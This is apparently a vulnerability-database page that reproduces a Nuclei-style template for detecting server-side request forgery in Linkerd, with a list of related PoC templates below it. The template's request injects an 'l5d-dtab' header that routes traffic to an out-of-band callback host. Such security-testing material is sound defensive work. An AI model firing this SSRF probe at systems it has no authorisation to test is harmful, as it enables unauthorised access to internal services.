linkerd-ssrf-detection: Linkerd SSRF detection

漏洞描述

PoC代码[已公开]

id: linkerd-ssrf-detection

info:
  name: Linkerd SSRF detection
  author: dudez
  severity: high
  description: Linkerd is vulnerable to SSRF.
  reference:
    - https://twitter.com/nirvana_msu/status/1084144955034165248
  metadata:
    max-request: 1
  tags: ssrf,linkerd,oast,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100a6e196b917a9765a6a48351ff8a9dce5eaa2126ccdbd6e3f5b54fb6e3fc44cec02204d0c1db5075605998445b71aa610d392fdc3148e42a2581ed152c64b56d180b0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• honeypot-detection: Honeypot Detection
• POC CVE-2024-34061: Changedetection.io <=v0.45.21 - Cross-Site Scripting
• POC CVE-2024-51483: Changedetection.io <= 0.47.4 - Path Traversal
• POC azure-takeover-detection: Microsoft Azure Takeover Detection
• POC htpasswd-detection: Apache htpasswd Config - Detect
• POC changedetection-unauth: Changedetection.io Dashboard - Exposure
• POC cargo-takeover: cargo takeover detection
• POC frontify-takeover: frontify takeover detection
• POC ghost-takeover: ghost takeover detection
• POC gitbook-takeover: gitbook takeover detection
• POC helpjuice-takeover: helpjuice takeover detection
• POC helpscout-takeover: helpscout takeover detection
• POC hubspot-takeover: hubspot takeover detection